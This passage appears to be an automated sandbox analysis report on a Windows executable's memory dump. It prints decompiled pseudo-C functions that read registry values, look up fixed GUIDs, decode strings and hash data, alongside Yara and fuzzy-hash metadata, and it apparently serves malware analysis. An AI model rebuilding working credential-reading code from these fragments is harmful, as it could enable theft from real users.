                                                                                              0x0040bd13
                                                                                              0x0040bd14
                                                                                              0x0040bd16
                                                                                              0x0040bd1a
                                                                                              0x0040bd1d
                                                                                              0x0040bd1f
                                                                                              0x0040bd23
                                                                                              0x0040bd52
                                                                                              0x0040bd25
                                                                                              0x0040bd2a
                                                                                              0x0040bd2f
                                                                                              0x0040bd36
                                                                                              0x0040bd40
                                                                                              0x0040bd48
                                                                                              0x0040bd5d
                                                                                              0x0040bd63
                                                                                              0x0040bd6b
                                                                                              0x0040bd77
                                                                                              0x0040bd89

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: memset$memcpy
                                                                                              • String ID:
                                                                                              • API String ID: 368790112-0
                                                                                              • Opcode ID: 4c1dce2a3317b4880715cd557b1b90e7212d21989bb675327cb4115bdd69e9ea
                                                                                              • Instruction ID: 14e83d3a51f9c3b731822f35bbce0da2433a64988b134a744f8d54487411a0b4
                                                                                              • Opcode Fuzzy Hash: 4c1dce2a3317b4880715cd557b1b90e7212d21989bb675327cb4115bdd69e9ea
                                                                                              • Instruction Fuzzy Hash: 6F01F5B1680B0026D2356B26CC02F9A77A5AFA0714F000B1EF643666D1D7ACE244869C
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040246C, Relevance: 6.1, APIs: 4, Instructions: 127COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E0040246C(void* __eax, void* __ecx, intOrPtr _a4, intOrPtr _a8, char* _a12, intOrPtr _a16) {
				void _v2058;
				char _v2060;
				char _v2069;
				char _v2070;
				char _v2071;
				char _v2072;
				char _v3086;
				signed char _v3090;
				char _v3091;
				char _v3092;
				char* _v3096;
				char _v3100;
				short* _v3104;
				int _v3108;
				char _v3112;
				void* __ebx;
				void* _t49;
				signed int _t61;
				short* _t76;
				void* _t83;
				signed int _t87;
				void* _t90;

				_t83 = __eax;
				_t73 = 0;
				 *_a12 = 0;
				_v3112 = 0x400;
				_t49 = E0040EBA3(__ecx, _a4, _a8,  &_v3092,  &_v3112);
				_t90 = (_t87 & 0xfffffff8) - 0xc28 + 0x10;
				if(_t49 == 0) {
					_v2069 = 0;
					_v2070 = 0;
					_v2071 = 0;
					_v2072 = 0;
					if(_v3092 != 1) {
						if(_v3092 == 2 &&  *((intOrPtr*)(_t83 + 0xa94)) != 0) {
							_v3100 = _v3112 - 1;
							_v3096 =  &_v3091;
							if(E00404811(_t83 + 0x890,  &_v3100, 0,  &_v3108) != 0) {
								WideCharToMultiByte(0, 0, _v3104, _v3108, _a12, 0x7f, 0, 0);
								LocalFree(_v3104);
							}
						}
					} else {
						if( *((intOrPtr*)(_t83 + 0x888)) != 0) {
							if(_a16 == 0) {
								E0040E988(_a12, _t83 + 0x87c,  &_v3090, 0x7f, 0);
							} else {
								_v2060 = 0;
								memset( &_v2058, 0, 0x800);
								_t90 = _t90 + 0xc;
								_t76 =  &_v2060;
								E0040E988(_t76, _t83 + 0x87c,  &_v3091, 0x400, 1);
								WideCharToMultiByte(0, 0, _t76, 0xffffffff, _a12, 0x7f, 0, 0);
							}
							_t73 = 0;
						}
						_t79 = _a12;
						if( *_a12 == _t73 && _v3112 >= 7 && _v3092 == 1 && _v3091 == 1) {
							_t61 = _v3090 & 0x000000ff;
							if(_t61 > 1 && _v3112 >= _t61 + 6) {
								E00401DFD(_t79,  &_v3086, _t61);
							}
						}
					}
				}
				return 0 |  *_a12 != _t73;
			}

























                                                                                              0x0040247a
                                                                                              0x0040247f
                                                                                              0x00402481
                                                                                              0x00402490
                                                                                              0x0040249b
                                                                                              0x004024a0
                                                                                              0x004024a5
                                                                                              0x004024b0
                                                                                              0x004024b7
                                                                                              0x004024be
                                                                                              0x004024c5
                                                                                              0x004024cc
                                                                                              0x0040259e
                                                                                              0x004025ad
                                                                                              0x004025b5
                                                                                              0x004025d1
                                                                                              0x004025e4
                                                                                              0x004025ee
                                                                                              0x004025ee
                                                                                              0x004025d1
                                                                                              0x004024d2
                                                                                              0x004024d8
                                                                                              0x004024dd
                                                                                              0x00402546
                                                                                              0x004024df
                                                                                              0x004024ed
                                                                                              0x004024f5
                                                                                              0x004024fa
                                                                                              0x00402510
                                                                                              0x00402517
                                                                                              0x0040252c
                                                                                              0x0040252c
                                                                                              0x0040254b
                                                                                              0x0040254b
                                                                                              0x0040254d
                                                                                              0x00402552
                                                                                              0x00402575
                                                                                              0x0040257d
                                                                                              0x0040258f
                                                                                              0x00402594
                                                                                              0x0040257d
                                                                                              0x00402552
                                                                                              0x004024cc
                                                                                              0x00402603

                                                                                              APIs
                                                                                                • Part of subcall function 0040EBA3: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,004024A0,?), ref: 0040EBB9
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 0040252C
                                                                                              • memset.MSVCRT ref: 004024F5
                                                                                                • Part of subcall function 0040E988: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 0040E9A5
                                                                                                • Part of subcall function 0040E988: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 0040E9C6
                                                                                                • Part of subcall function 0040E988: memcpy.MSVCRT ref: 0040EA04
                                                                                                • Part of subcall function 0040E988: CoTaskMemFree.OLE32(00000000,00000000), ref: 0040EA13
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 004025E4
                                                                                              • LocalFree.KERNEL32(?), ref: 004025EE
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ByteCharFreeFromMultiStringUuidWide$LocalQueryTaskValuememcpymemset
                                                                                              • String ID:
                                                                                              • API String ID: 3503910906-0
                                                                                              • Opcode ID: bb52322aa56186edb046b50904625ef5fe77f2ed0f2dccde0d18aa7e90448571
                                                                                              • Instruction ID: 8b275e149f62785490509d2466391155d2af3f8991a5b00387cc308873e1222d
                                                                                              • Opcode Fuzzy Hash: bb52322aa56186edb046b50904625ef5fe77f2ed0f2dccde0d18aa7e90448571
                                                                                              • Instruction Fuzzy Hash: 7041B4B1408384BFD711DB608D44AEBBBDCBB48308F44493EFA98A21D1D678DA54DB5A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040B3C4, Relevance: 6.1, APIs: 4, Instructions: 115windowCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 98%
                                                                                              			E0040B3C4(intOrPtr __ecx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void _v263;
				char _v264;
				void* __edi;
				void* __esi;
				signed int _t42;
				signed int _t45;
				intOrPtr* _t60;
				signed char _t62;
				intOrPtr _t63;
				int _t65;

				_t61 = __ecx;
				_t60 = _a8;
				_t63 = __ecx;
				_v8 = __ecx;
				if( *(_t60 + 4) == 0x103 &&  *((intOrPtr*)(_t60 + 8)) == 0xfffffff4) {
					_t42 = E00408BA0( *((intOrPtr*)(__ecx + 0x370)), _t60);
					 *((intOrPtr*)(_t63 + 0x10c)) = 1;
					 *(_t63 + 0x110) = _t42;
				}
				if(_a4 == 0x101 &&  *((intOrPtr*)(_t60 + 8)) == 0xfffffffe &&  *((intOrPtr*)(_t60 + 0xc)) == 1) {
					_v264 = 0;
					memset( &_v263, 0, 0xff);
					E00401000(_t61,  &_v264, 0x412440);
					_t42 = E00406523( *((intOrPtr*)(_v8 + 0x108)),  &_v264);
					_t63 = _v8;
				}
				_t65 = 0;
				if( *((intOrPtr*)(_t60 + 8)) == 0xfffffdf8) {
					_t42 = SendMessageA( *(_t63 + 0x118), 0x423, 0, 0);
					if( *_t60 == _t42) {
						_t42 = GetMenuStringA( *(_t63 + 0x11c),  *(_t60 + 4), _t60 + 0x10, 0x4f, 0);
						 *((intOrPtr*)(_t60 + 0x60)) = 0;
					}
				}
				if(_a4 != 0x103) {
					L27:
					return _t42;
				} else {
					_t80 =  *((intOrPtr*)(_t60 + 8)) - 0xfffffffd;
					if( *((intOrPtr*)(_t60 + 8)) == 0xfffffffd) {
						_t42 = E0040AEAA(_t61, _t63, _t63, _t80);
						_t65 = 0;
					}
					if( *((intOrPtr*)(_t60 + 8)) == 0xffffff94) {
						_t42 = E00408ACB( *(_t60 + 0x10), _t61,  *((intOrPtr*)(_t63 + 0x370)), _t65);
						_t65 = 0;
					}
					if( *((intOrPtr*)(_t60 + 8)) != 0xffffff9b) {
						goto L27;
					} else {
						if( *((intOrPtr*)( *((intOrPtr*)(_t63 + 0x370)) + 0x1b8)) == _t65) {
							_t62 = 2;
							_t45 =  *(_t60 + 0x14) & _t62;
							__eflags = _t45;
							if(_t45 == 0) {
								L20:
								__eflags = _t45 - _t62;
								if(_t45 == _t62) {
									L23:
									_t42 = 0;
									__eflags = 0;
									L24:
									if(_t42 == _t65) {
										goto L27;
									}
									_t42 = _t63 + 0x25c;
									if( *_t42 != _t65) {
										goto L27;
									}
									 *_t42 = 1;
									return PostMessageA( *(_t63 + 0x108), 0x402, _t65, _t65);
								}
								__eflags =  *(_t60 + 0x18) & _t62;
								if(( *(_t60 + 0x18) & _t62) == 0) {
									goto L23;
								}
								L22:
								_t42 = 1;
								goto L24;
							}
							__eflags =  *(_t60 + 0x18) & _t62;
							if(( *(_t60 + 0x18) & _t62) == 0) {
								goto L22;
							}
							goto L20;
						}
						asm("sbb eax, eax");
						_t42 =  ~( ~(( *(_t60 + 0x18) ^  *(_t60 + 0x14)) & 0x0000f002));
						goto L24;
					}
				}
			}














                                                                                              0x0040b3c4
                                                                                              0x0040b3ce
                                                                                              0x0040b3da
                                                                                              0x0040b3dc
                                                                                              0x0040b3df
                                                                                              0x0040b3ef
                                                                                              0x0040b3f4
                                                                                              0x0040b3fe
                                                                                              0x0040b3fe
                                                                                              0x0040b40b
                                                                                              0x0040b427
                                                                                              0x0040b42e
                                                                                              0x0040b43e
                                                                                              0x0040b44f
                                                                                              0x0040b454
                                                                                              0x0040b457
                                                                                              0x0040b45a
                                                                                              0x0040b463
                                                                                              0x0040b472
                                                                                              0x0040b47a
                                                                                              0x0040b48c
                                                                                              0x0040b492
                                                                                              0x0040b492
                                                                                              0x0040b47a
                                                                                              0x0040b49c
                                                                                              0x0040b539
                                                                                              0x0040b539
                                                                                              0x0040b4a2
                                                                                              0x0040b4a2
                                                                                              0x0040b4a6
                                                                                              0x0040b4aa
                                                                                              0x0040b4af
                                                                                              0x0040b4af
                                                                                              0x0040b4b5
                                                                                              0x0040b4c1
                                                                                              0x0040b4c6
                                                                                              0x0040b4c6
                                                                                              0x0040b4cc
                                                                                              0x00000000
                                                                                              0x0040b4ce
                                                                                              0x0040b4da
                                                                                              0x0040b4f4
                                                                                              0x0040b4f5
                                                                                              0x0040b4f5
                                                                                              0x0040b4f7
                                                                                              0x0040b4fe
                                                                                              0x0040b4fe
                                                                                              0x0040b500
                                                                                              0x0040b50c
                                                                                              0x0040b50c
                                                                                              0x0040b50c
                                                                                              0x0040b50e
                                                                                              0x0040b510
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040b512
                                                                                              0x0040b51a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040b529
                                                                                              0x00000000
                                                                                              0x0040b52f
                                                                                              0x0040b502
                                                                                              0x0040b505
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040b507
                                                                                              0x0040b509
                                                                                              0x00000000
                                                                                              0x0040b509
                                                                                              0x0040b4f9
                                                                                              0x0040b4fc
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040b4fc
                                                                                              0x0040b4e9
                                                                                              0x0040b4eb
                                                                                              0x00000000
                                                                                              0x0040b4eb
                                                                                              0x0040b4cc

                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0040B42E
                                                                                              • SendMessageA.USER32 ref: 0040B472
                                                                                              • GetMenuStringA.USER32(?,00000103,?,0000004F,00000000), ref: 0040B48C
                                                                                              • PostMessageA.USER32 ref: 0040B52F
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Message$MenuPostSendStringmemset
                                                                                              • String ID:
                                                                                              • API String ID: 3798638045-0
                                                                                              • Opcode ID: c3aa6ddd336313682f51672c6081f6f8049648b04dcffedc212cd8d1236b5249
                                                                                              • Instruction ID: e99ea3cd5ae45d968ce1bb78ba156cefd6297a3afaf0c32d246f8b1269deedf3
                                                                                              • Opcode Fuzzy Hash: c3aa6ddd336313682f51672c6081f6f8049648b04dcffedc212cd8d1236b5249
                                                                                              • Instruction Fuzzy Hash: 5041F430600611EBCB25DF24CC85A96B7A4FF14324F1482B6E958AB2C6C378DE91CBDC
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040A119, Relevance: 6.1, APIs: 4, Instructions: 114stringCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 94%
                                                                                              			E0040A119(void* __eax, void* __eflags, char* _a4, intOrPtr _a8) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				signed int _t63;
				intOrPtr _t67;
				intOrPtr _t72;
				intOrPtr _t74;
				signed int _t79;
				void* _t84;
				signed int _t86;
				char* _t98;
				void* _t100;
				void* _t102;
				void* _t104;
				void* _t106;
				void* _t107;

				_t84 = __eax;
				E0040892D(__eax, __eflags);
				_t86 = 0;
				_v12 = 0;
				while(1) {
					_t98 = _a4;
					if( *((intOrPtr*)(_t86 + _t98)) - 0x30 > 9) {
						break;
					}
					_t86 = _t86 + 1;
					if(_t86 < 1) {
						continue;
					}
					if(strlen(_t98) >= 3) {
						break;
					}
					_t79 = atoi(_a4);
					if(_t79 >= 0 && _t79 <  *((intOrPtr*)(_t84 + 0x20))) {
						_v12 =  *((intOrPtr*)( *( *((intOrPtr*)(_t84 + 0x24)) + _t79 * 4) * 0x14 +  *((intOrPtr*)(_t84 + 0x1b4))));
					}
					L21:
					if(_a8 != 0) {
						_v12 = _v12 | 0x00001000;
					}
					_t63 = _v12;
					 *0x41748c =  *0x41748c + 1;
					 *((intOrPtr*)(0x417490 +  *0x41748c * 4)) = _t63;
					return _t63;
				}
				_t104 = 0;
				__eflags =  *((intOrPtr*)(_t84 + 0x1b0));
				_v16 = 0;
				_v8 = 0;
				if( *((intOrPtr*)(_t84 + 0x1b0)) <= 0) {
					L14:
					_t100 = 0;
					__eflags =  *((intOrPtr*)(_t84 + 0x1b0));
					_v8 = 0;
					if( *((intOrPtr*)(_t84 + 0x1b0)) <= 0) {
						L20:
						goto L21;
					}
					_t106 = 0;
					__eflags = 0;
					do {
						_v20 = E004069D2(0, _a4);
						_t67 = E004069D2(0, _a4);
						__eflags = _v20;
						if(_v20 >= 0) {
							L18:
							_v12 =  *((intOrPtr*)(_t106 +  *((intOrPtr*)(_t84 + 0x1b4))));
							goto L19;
						}
						__eflags = _t67;
						if(_t67 < 0) {
							goto L19;
						}
						goto L18;
						L19:
						_v8 = _v8 + 1;
						_t100 = _t100 + 0x10;
						_t106 = _t106 + 0x14;
						__eflags = _v8 -  *((intOrPtr*)(_t84 + 0x1b0));
					} while (_v8 <  *((intOrPtr*)(_t84 + 0x1b0)));
					goto L20;
				}
				_t102 = 0;
				__eflags = 0;
				do {
					_t72 =  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x1b4)) + _t104 + 0x10));
					_push(_a4);
					_push(_t72);
					L004115C4();
					_push(_a4);
					_v20 = _t72;
					_t74 =  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x34)) + _t102 + 0xc));
					_push(_t74);
					L004115C4();
					_t107 = _t107 + 0x10;
					__eflags = _v20;
					if(_v20 == 0) {
						L11:
						_v12 =  *(_t104 +  *((intOrPtr*)(_t84 + 0x1b4)));
						_v16 = 1;
						goto L12;
					}
					__eflags = _t74;
					if(_t74 != 0) {
						goto L12;
					}
					goto L11;
					L12:
					_v8 = _v8 + 1;
					_t102 = _t102 + 0x10;
					_t104 = _t104 + 0x14;
					__eflags = _v8 -  *((intOrPtr*)(_t84 + 0x1b0));
				} while (_v8 <  *((intOrPtr*)(_t84 + 0x1b0)));
				__eflags = _v16;
				if(_v16 != 0) {
					goto L20;
				}
				goto L14;
			}





















                                                                                              0x0040a120
                                                                                              0x0040a122
                                                                                              0x0040a127
                                                                                              0x0040a129
                                                                                              0x0040a12c
                                                                                              0x0040a12c
                                                                                              0x0040a136
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040a138
                                                                                              0x0040a13c
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040a148
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040a14d
                                                                                              0x0040a155
                                                                                              0x0040a176
                                                                                              0x0040a176
                                                                                              0x0040a257
                                                                                              0x0040a25c
                                                                                              0x0040a25e
                                                                                              0x0040a25e
                                                                                              0x0040a26b
                                                                                              0x0040a26e
                                                                                              0x0040a274
                                                                                              0x0040a27c
                                                                                              0x0040a27c
                                                                                              0x0040a17f
                                                                                              0x0040a181
                                                                                              0x0040a188
                                                                                              0x0040a18b
                                                                                              0x0040a18e
                                                                                              0x0040a1f2
                                                                                              0x0040a1f2
                                                                                              0x0040a1f4
                                                                                              0x0040a1fa
                                                                                              0x0040a1fd
                                                                                              0x0040a255
                                                                                              0x00000000
                                                                                              0x0040a256
                                                                                              0x0040a1ff
                                                                                              0x0040a1ff
                                                                                              0x0040a201
                                                                                              0x0040a21f
                                                                                              0x0040a224
                                                                                              0x0040a229
                                                                                              0x0040a22f
                                                                                              0x0040a235
                                                                                              0x0040a23e
                                                                                              0x00000000
                                                                                              0x0040a23e
                                                                                              0x0040a231
                                                                                              0x0040a233
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040a241
                                                                                              0x0040a241
                                                                                              0x0040a247
                                                                                              0x0040a24a
                                                                                              0x0040a24d
                                                                                              0x0040a24d
                                                                                              0x00000000
                                                                                              0x0040a201
                                                                                              0x0040a190
                                                                                              0x0040a190
                                                                                              0x0040a192
                                                                                              0x0040a198
                                                                                              0x0040a19c
                                                                                              0x0040a19f
                                                                                              0x0040a1a0
                                                                                              0x0040a1a5
                                                                                              0x0040a1a8
                                                                                              0x0040a1ae
                                                                                              0x0040a1b2
                                                                                              0x0040a1b3
                                                                                              0x0040a1b8
                                                                                              0x0040a1bb
                                                                                              0x0040a1bf
                                                                                              0x0040a1c5
                                                                                              0x0040a1ce
                                                                                              0x0040a1d1
                                                                                              0x00000000
                                                                                              0x0040a1d1
                                                                                              0x0040a1c1
                                                                                              0x0040a1c3
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040a1d8
                                                                                              0x0040a1d8
                                                                                              0x0040a1de
                                                                                              0x0040a1e1
                                                                                              0x0040a1e4
                                                                                              0x0040a1e4
                                                                                              0x0040a1ec
                                                                                              0x0040a1f0
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000

                                                                                              APIs
                                                                                                • Part of subcall function 0040892D: ??2@YAPAXI@Z.MSVCRT ref: 0040894E
                                                                                                • Part of subcall function 0040892D: ??3@YAXPAX@Z.MSVCRT ref: 00408A15
                                                                                              • strlen.MSVCRT ref: 0040A13F
                                                                                              • atoi.MSVCRT ref: 0040A14D
                                                                                              • _mbsicmp.MSVCRT ref: 0040A1A0
                                                                                              • _mbsicmp.MSVCRT ref: 0040A1B3
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _mbsicmp$??2@??3@atoistrlen
                                                                                              • String ID:
                                                                                              • API String ID: 4107816708-0
                                                                                              • Opcode ID: 04d0626d4e34a8bed9540d47d501c89c47d505d3d6eba4bb40819434c6ba53c8
                                                                                              • Instruction ID: ad5e67b725479cd3c0fe98911646f79d6f4c04cefe3616236e53ea043d5b2769
                                                                                              • Opcode Fuzzy Hash: 04d0626d4e34a8bed9540d47d501c89c47d505d3d6eba4bb40819434c6ba53c8
                                                                                              • Instruction Fuzzy Hash: 24414B75900304AFCB10DFA9C580A9ABBF5FB48308F1084BEEC05AB392D7399A51CB59
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00410E8A, Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 84stringCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E00410E8A(char* __eax, void* __edi) {
				unsigned int _v5;
				signed int _v6;
				signed int _v7;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _t37;
				char* _t56;
				signed char _t57;
				char* _t67;
				void* _t68;
				void* _t69;

				_t68 = __edi;
				_t56 = __eax;
				_t69 = 0;
				_t37 = strlen(__eax) + 0xfffffffd;
				_v16 = _t37;
				if(_t37 < 0) {
					L18:
					 *((char*)(_t69 + _t68)) = 0;
					return _t69;
				}
				_v12 = 0xfffffffe;
				_v12 = _v12 - _t56;
				_t5 = _t56 + 2; // 0x411004
				_t67 = _t5;
				while(1) {
					_t6 = _t67 - 2; // 0x75fff88b
					_t39 =  *_t6;
					if( *_t6 != 0x2e) {
						_v6 = E00410E56(_t39);
					} else {
						_v6 = 0x3e;
					}
					_t9 = _t67 - 1; // 0xfc75fff8
					_t41 =  *_t9;
					if( *_t9 != 0x2e) {
						_v5 = E00410E56(_t41);
					} else {
						_v5 = 0x3e;
					}
					_t43 =  *_t67;
					if( *_t67 != 0x2e) {
						_t57 = E00410E56(_t43);
					} else {
						_t57 = 0x3e;
					}
					_t45 =  *((intOrPtr*)(_t67 + 1));
					if( *((intOrPtr*)(_t67 + 1)) != 0x2e) {
						_v7 = E00410E56(_t45);
					} else {
						_v7 = 0x3e;
					}
					 *(_t68 + _t69) = _v5 >> 0x00000004 | _v6 << 0x00000002;
					if( *_t67 == 0x2d) {
						break;
					}
					 *(_t69 + _t68 + 1) = _t57 >> 0x00000002 | _v5 << 0x00000004;
					if( *((char*)(_t67 + 1)) == 0x2d) {
						 *((char*)(_t69 + _t68 + 2)) = 0;
						_t34 = _t69 + 2; // 0x2
						return _t34;
					}
					_t69 = _t69 + 3;
					 *(_t69 + _t68 - 1) = _t57 << 0x00000006 | _v7;
					_t25 = _t69 + 5; // 0x2
					_t67 = _t67 + 4;
					if(_t25 >= 0x3ff || _v12 + _t67 > _v16) {
						goto L18;
					} else {
						continue;
					}
				}
				 *(_t69 + _t68 + 1) = 0;
				_t31 = _t69 + 1; // 0x1
				return _t31;
			}














                                                                                              0x00410e8a
                                                                                              0x00410e92
                                                                                              0x00410e95
                                                                                              0x00410e9c
                                                                                              0x00410ea0
                                                                                              0x00410ea3
                                                                                              0x00410f5b
                                                                                              0x00410f5b
                                                                                              0x00000000
                                                                                              0x00410f5f
                                                                                              0x00410ea9
                                                                                              0x00410eb0
                                                                                              0x00410eb3
                                                                                              0x00410eb3
                                                                                              0x00410eb6
                                                                                              0x00410eb6
                                                                                              0x00410eb6
                                                                                              0x00410ebb
                                                                                              0x00410ec8
                                                                                              0x00410ebd
                                                                                              0x00410ebd
                                                                                              0x00410ebd
                                                                                              0x00410ecb
                                                                                              0x00410ecb
                                                                                              0x00410ed0
                                                                                              0x00410edd
                                                                                              0x00410ed2
                                                                                              0x00410ed2
                                                                                              0x00410ed2
                                                                                              0x00410ee0
                                                                                              0x00410ee4
                                                                                              0x00410eef
                                                                                              0x00410ee6
                                                                                              0x00410ee6
                                                                                              0x00410ee6
                                                                                              0x00410ef1
                                                                                              0x00410ef6
                                                                                              0x00410f03
                                                                                              0x00410ef8
                                                                                              0x00410ef8
                                                                                              0x00410ef8
                                                                                              0x00410f14
                                                                                              0x00410f1a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00410f29
                                                                                              0x00410f31
                                                                                              0x00410f6f
                                                                                              0x00410f74
                                                                                              0x00000000
                                                                                              0x00410f74
                                                                                              0x00410f39
                                                                                              0x00410f3c
                                                                                              0x00410f40
                                                                                              0x00410f43
                                                                                              0x00410f4b
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00410f4b
                                                                                              0x00410f65
                                                                                              0x00410f6a
                                                                                              0x00000000

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: strlen
                                                                                              • String ID: >$>$>
                                                                                              • API String ID: 39653677-3911187716
                                                                                              • Opcode ID: cc9d2e4949e9ff96ebc93a83fa171427e13732e23a33d014681ceaf85bfc699f
                                                                                              • Instruction ID: 69dee6f6c2e5f632f5f5b053a668a00b89048f502478ac4f4f3cd81ce8891ac8
                                                                                              • Opcode Fuzzy Hash: cc9d2e4949e9ff96ebc93a83fa171427e13732e23a33d014681ceaf85bfc699f
                                                                                              • Instruction Fuzzy Hash: D331D5318097C49ED7218B6980563EFFFA14F26304F188ADAD0E557343D2EC96CAC75A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040BC6D, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 50%
                                                                                              			E0040BC6D(signed int __eax, void* __ecx, void* _a4) {
				unsigned int _t23;
				signed int _t25;
				unsigned int _t34;
				unsigned int _t36;
				void* _t40;
				unsigned int _t45;
				void* _t46;
				int _t47;
				void* _t48;
				void* _t50;

				_t48 = __ecx;
				_t34 = __eax;
				_t23 =  *(__ecx + 0x10);
				_t36 = _t23 + __eax * 8;
				 *(__ecx + 0x10) = _t36;
				if(_t36 < _t23) {
					 *((intOrPtr*)(__ecx + 0x14)) =  *((intOrPtr*)(__ecx + 0x14)) + 1;
				}
				 *((intOrPtr*)(_t48 + 0x14)) =  *((intOrPtr*)(_t48 + 0x14)) + (_t34 >> 0x1d);
				_t25 = _t23 >> 0x00000003 & 0x0000003f;
				if(_t25 == 0) {
					L6:
					if(_t34 >= 0x40) {
						_t45 = _t34 >> 6;
						do {
							memcpy(_t48 + 0x18, _a4, 0x40);
							_t50 = _t50 + 0xc;
							E0040BD8A(_t48 + 0x18, _t48);
							_a4 = _a4 + 0x40;
							_t34 = _t34 - 0x40;
							_t45 = _t45 - 1;
						} while (_t45 != 0);
					}
					_push(_t34);
					_push(_a4);
					_push(_t48 + 0x18);
				} else {
					_t46 = 0x40;
					_t47 = _t46 - _t25;
					_t40 = _t48 + 0x18 + _t25;
					if(_t34 >= _t47) {
						memcpy(_t40, _a4, _t47);
						_t50 = _t50 + 0xc;
						E0040BD8A(_t48 + 0x18, _t48);
						_a4 = _a4 + _t47;
						_t34 = _t34 - _t47;
						goto L6;
					} else {
						_push(_t34);
						_push(_a4);
						_push(_t40);
					}
				}
				return memcpy();
			}













                                                                                              0x0040bc72
                                                                                              0x0040bc74
                                                                                              0x0040bc76
                                                                                              0x0040bc79
                                                                                              0x0040bc7f
                                                                                              0x0040bc82
                                                                                              0x0040bc84
                                                                                              0x0040bc84
                                                                                              0x0040bc8c
                                                                                              0x0040bc92
                                                                                              0x0040bc95
                                                                                              0x0040bcc7
                                                                                              0x0040bcca
                                                                                              0x0040bcce
                                                                                              0x0040bcd1
                                                                                              0x0040bcda
                                                                                              0x0040bcdf
                                                                                              0x0040bce7
                                                                                              0x0040bcec
                                                                                              0x0040bcf0
                                                                                              0x0040bcf3
                                                                                              0x0040bcf3
                                                                                              0x0040bcd1
                                                                                              0x0040bcf6
                                                                                              0x0040bcf7
                                                                                              0x0040bcfd
                                                                                              0x0040bc97
                                                                                              0x0040bc99
                                                                                              0x0040bc9a
                                                                                              0x0040bc9e
                                                                                              0x0040bca2
                                                                                              0x0040bcb0
                                                                                              0x0040bcb5
                                                                                              0x0040bcbd
                                                                                              0x0040bcc2
                                                                                              0x0040bcc5
                                                                                              0x00000000
                                                                                              0x0040bca4
                                                                                              0x0040bca4
                                                                                              0x0040bca5
                                                                                              0x0040bca8
                                                                                              0x0040bca8
                                                                                              0x0040bca2
                                                                                              0x0040bd0a

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: memcpy
                                                                                              • String ID: @
